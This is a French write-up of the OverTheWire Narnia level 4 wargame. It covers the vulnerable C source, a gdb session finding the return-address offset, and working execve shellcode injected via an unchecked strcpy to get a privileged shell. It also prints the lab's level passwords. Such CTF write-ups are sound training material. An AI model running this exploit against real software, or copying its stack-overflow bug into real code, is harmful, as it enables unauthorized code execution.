====== Level 4 ======
ssh narnia4@narnia.labs.overthewire.org
pass : thaenohtai
#include
#include
#include
#include
/* Pointer to the process environment: a NULL-terminated array of
 * "NAME=value" strings, provided by the C runtime. */
extern char **environ;

/*
 * Challenge binary for narnia level 4.
 *
 * Wipes the contents of every environment string, then copies argv[1]
 * into a fixed-size stack buffer with no length check.
 *
 * argc/argv: standard program arguments; only argv[1] is used.
 * Returns 0 unconditionally.
 */
int main(int argc, char **argv) {
    int i;
    char buffer[256];           /* 256 bytes on the stack, never bounds-checked below */

    /* Overwrite each environment string in place with '\0' bytes, for its
     * full length.  Only the string contents are cleared: the environ[]
     * pointers themselves are left untouched. */
    for (i = 0; environ[i] != NULL; i++)
        memset(environ[i], '\0', strlen(environ[i]));

    /* Stack buffer overflow: strcpy copies argv[1] until its terminating
     * NUL, so any argument longer than 255 bytes writes past the end of
     * buffer (into the saved frame pointer and return address).
     * NOTE(review): a bounded copy such as
     * snprintf(buffer, sizeof buffer, "%s", argv[1]) would close this. */
    if (argc > 1)
        strcpy(buffer, argv[1]);

    return 0;
}
Stack buffer overflow classique. Si vous avez l'habitude de placer votre shellcode dans les variables d'environnement, ce n'est pas possible ici : chaque chaîne de l'environnement est entièrement écrasée par des octets ''\0'' avant la copie (seul le contenu est effacé, les pointeurs d'''environ'' restent en place). On va donc mettre directement notre shellcode dans ''buffer'' (256 octets, rempli par ''strcpy'' sans aucune vérification de taille) et sauter dessus :)
gdb$ r $(python -c 'print "\xcc"*272+"BBBB"')
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 00000000 EBX: F7FD2FF4 ECX: 00000000 EDX: FFFFD919 o d I t s Z a P c
ESI: 00000000 EDI: 00000000 EBP: CCCCCCCC ESP: FFFFD620 EIP: 42424242
CS: 0023 DS: 002B ES: 002B FS: 0000 GS: 0063 SS: 002B
Error while running hook_stop:
Cannot access memory at address 0x42424242
0x42424242 in ?? ()
gdb$ x/200x $esp
0xffffd620: 0x00000000 0xffffd6c4 0xffffd6d0 0xf7fdf420
0xffffd630: 0xffffffff 0xf7ffcff4 0x0804827a 0x00000001
0xffffd640: 0xffffd680 0xf7fedd61 0xf7ffdad0 0xf7fd72e8
0xffffd650: 0x00000001 0xf7fd2ff4 0x00000000 0x00000000
0xffffd660: 0xffffd698 0x5326f6a1 0x7db14eb1 0x00000000
0xffffd670: 0x00000000 0x00000000 0x00000002 0x080483a0
0xffffd680: 0x00000000 0xf7ff3f70 0xf7e89d5b 0xf7ffcff4
0xffffd690: 0x00000002 0x080483a0 0x00000000 0x080483c1
0xffffd6a0: 0x08048454 0x00000002 0xffffd6c4 0x08048500
0xffffd6b0: 0x08048560 0xf7feed80 0xffffd6bc 0xf7ffd918
0xffffd6c0: 0x00000002 0xffffd7f4 0xffffd804 0x00000000
0xffffd6d0: 0xffffd919 0xffffd929 0xffffd93d 0xffffd95e
0xffffd6e0: 0xffffd971 0xffffd984 0xffffd991 0xffffde81
0xffffd6f0: 0xffffde8c 0xffffde98 0xffffdee5 0xffffdefc
0xffffd700: 0xffffdf0b 0xffffdf17 0xffffdf28 0xffffdf31
0xffffd710: 0xffffdf44 0xffffdf4c 0xffffdf5c 0xffffdf71
0xffffd720: 0xffffdfa6 0xffffdfc6 0x00000000 0x00000020
0xffffd730: 0xf7fdf420 0x00000021 0xf7fdf000 0x00000010
0xffffd740: 0x17898175 0x00000006 0x00001000 0x00000011
0xffffd750: 0x00000064 0x00000003 0x08048034 0x00000004
0xffffd760: 0x00000020 0x00000005 0x00000007 0x00000007
0xffffd770: 0xf7fe0000 0x00000008 0x00000000 0x00000009
0xffffd780: 0x080483a0 0x0000000b 0x000036b4 0x0000000c
0xffffd790: 0x000036b4 0x0000000d 0x000036b4 0x0000000e
0xffffd7a0: 0x000036b4 0x00000017 0x00000000 0x00000019
0xffffd7b0: 0xffffd7db 0x0000001f 0xffffdfe8 0x0000000f
0xffffd7c0: 0xffffd7eb 0x00000000 0x00000000 0x00000000
0xffffd7d0: 0x00000000 0x00000000 0x08000000 0x5b4ce26c
0xffffd7e0: 0x85af5645 0x503435d7 0x69632138 0x00363836
0xffffd7f0: 0x00000000 0x706d742f 0x2f346e2f 0x6e72616e
0xffffd800: 0x00346169 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd810: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd820: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd830: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd840: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd850: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd860: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd870: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd880: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd890: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd8a0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd8b0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd8c0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd8d0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd8e0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd8f0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd900: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd910: 0xcccccccc 0x42424242 0x00000000 0x00000000
EIP a bien été écrasé par ''0x42424242'', ce qui confirme que le décalage de 272 octets est le bon. Nous pouvons donc par exemple sauter à l'adresse ''0xffffd830'', qui tombe en plein dans la zone remplie par nos octets ''0xcc'' (le contenu de ''buffer'').
narnia4@melissa:/tmp/n4$ ./narnia4 $(python -c 'print "\x90"*239+"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"+"\x30\xd8\xff\xff"')
bash-4.2$ id
uid=14004(narnia4) gid=14004(narnia4) euid=14005(narnia5) groups=14005(narnia5),14004(narnia4)
bash-4.2$ cat /etc/narnia_pass/narnia5
faimahchiy